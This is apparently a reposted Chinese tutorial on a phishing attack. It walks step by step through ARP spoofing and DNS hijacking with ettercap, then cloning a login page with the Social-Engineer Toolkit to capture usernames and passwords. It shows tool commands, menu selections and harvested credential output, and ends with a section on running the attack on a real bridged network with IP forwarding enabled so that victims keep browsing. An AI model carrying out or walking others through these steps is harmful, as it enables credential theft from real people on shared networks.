社会工程学攻击案例-网站钓鱼
社會工程學(xué)攻擊案例-網(wǎng)站釣魚
滲透攻擊原理
攻擊機(jī)與其他主機(jī)在同一局域網(wǎng)內(nèi),通過 ARP 欺騙使其他主機(jī)的流量都經(jīng)過攻擊機(jī),有選擇性的抓取數(shù)據(jù)包,例如攻擊者想要竊取用戶登錄百度網(wǎng)站的信息,采取克隆站點的方式,來強(qiáng)制引導(dǎo)用戶主機(jī)的流量。 該攻擊方式需要執(zhí)行以下三個步驟:
1、ARP 欺騙
2、域名劫持
3、網(wǎng)站克隆
BT5實現(xiàn)
1、啟動社會工程學(xué)攻擊集
root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set2、選擇網(wǎng)頁攻擊
1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) Third Party Modules 10) Update the Metasploit Framework 11) Update the Social-Engineer Toolkit 12) Help, Credits, and About 99) Exit the Social-Enginee r Toolkit Select from the menu: set>23、選擇賬號竊取
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Create or im port a CodeSigning Certificate 99) Return to Main Menu set: webattack > 34、選擇克隆站點
1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack > 25、開始克隆
set:webattack > Enter the url to clone: http://10.10.10.129/signin.html Press {return} to continue.6、靶機(jī)測試
之后再靶機(jī)上用瀏覽器輸入 http://10.10.10.131,并填寫登陸用戶名和密碼
7、賬號獲取
[*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: username=admin POSSIBLE PASSWORD FIELD FOUND: password=dvssc@admin01 POSSIBLE USERNAME FIELD FOUND: Login=LoginKali Linux實現(xiàn)
一、域名劫持(域名欺騙)ettercap
1、啟動 ettercap
ettercap -G2、主機(jī)掃描
3、ARP欺騙
此時去靶機(jī) ARP 表查看是否毒化。
4、流址抓包
5、DNS欺騙
編輯 DNS 劫持內(nèi)容
開啟 DNS 欺騙泛洪
雙擊此模塊則開啟,再雙擊則關(guān)閉
PC 上測試 DNS 欺騙
二、網(wǎng)站克隆
1、啟動 SET(路徑與 BT5 不同)
cd /usr/share/set ./setookit
2、選項1,社會工程學(xué)攻擊
3、選項2,網(wǎng)頁欺騙攻擊
4、選觀3,網(wǎng)頁克隆攻擊
5、選項2,單個站點克隆
6、輸入攻擊機(jī)的 IP 地址
7、輸入克隆的網(wǎng)頁地址
8、開始克隆網(wǎng)頁(開啟 apache)
若 Apache 服務(wù)默認(rèn)沒有開,這里會提示是否開始,選擇y;
肉雞訪問本地IP地址,則訪問的是一個虛假的 home.51cto.com,當(dāng)肉雞往這個頁面填寫如用戶名和密碼的時候,則可以被我們發(fā)現(xiàn)。
三、在靶機(jī)上測試效果
1、靶機(jī)能夠 ping 通攻擊者的 IP 地址
2、靶機(jī)瀏覽器輸入攻擊者的 IP 地址
3、靶機(jī)上輸入用戶名和密碼
4、點擊登陸之后會進(jìn)入真實的網(wǎng)頁
這個是真實頁面,但是剛才點擊登陸的時候,密碼已經(jīng)被截獲
5、打開攻擊者緩存文件查看用戶密碼
真實環(huán)境實現(xiàn)(Kali 橋接)
VMware模式:橋接模式/NAT模式
修改 IP 和路由(一次性)
ifconfig eth0 192.168.199.87 netmask 255.255.255.0 up //設(shè)置IP地址 route add default gw 192.168.199.1 //添加默認(rèn)路由修改 IP 和路由(永久性)
vim /etc/network/interfacesauto eth0 allow-hotplug eth0 iface eth0 inet static address 10.1.1.212 netmask 255.255.255.0 gateway 10.1.1.254為了使被攻擊機(jī)被欺騙后仍可正常上網(wǎng),需要添加路由轉(zhuǎn)發(fā)功能
root@PL-kali:# vim /etc/sysctl.conf # Uncomment the next line to enable packet forwarding for IPv4 net.ipv4.ip_forward=1 //將前面的注釋#刪掉,并重啟機(jī)器reboot修改DNS服務(wù)器
root@PL-kali:~# vim /etc/resolv.confnameserver 223.5.5.5剩余操作和虛擬環(huán)境下相同。
總結(jié)
以上是生活随笔為你收集整理的社会工程学攻击案例-网站钓鱼的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 利用 Django 动态展示 Pyech
- 下一篇: 【JZOJ 4623】搬运干草捆